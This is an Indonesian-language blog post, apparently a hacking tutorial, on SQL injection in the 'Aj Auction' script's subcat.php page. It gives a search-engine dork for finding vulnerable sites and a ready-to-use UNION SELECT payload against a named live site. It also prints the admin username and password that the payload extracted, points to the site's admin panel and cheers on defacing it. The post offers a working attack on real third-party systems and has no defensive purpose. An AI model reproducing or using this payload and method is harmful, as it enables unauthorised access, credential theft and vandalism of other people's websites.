SQL Injection pada Aj Auction untuk seluruh versi.
=======================================================
Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php
langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=
nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :
http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096
setelah cate_id= di hapus aja kemudian di ganti dengan
-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas
sword),2%20from%20admin/*&view=list
kira kira jadi begini
http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11
7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list
nah loh passwordnya langsung dapet
turkey:adminturkeypass:daniel87
itu artinya
usernamenya admin
passwordnya daniel87
sekarang masuk ke control panelnya
http://www.estoop.it/admin
terus masukkin username dan passwordnya
jreng jreng jreng anda di bawa ke control panel ...
hehehehe ... deface deface ...
No comments:
Post a Comment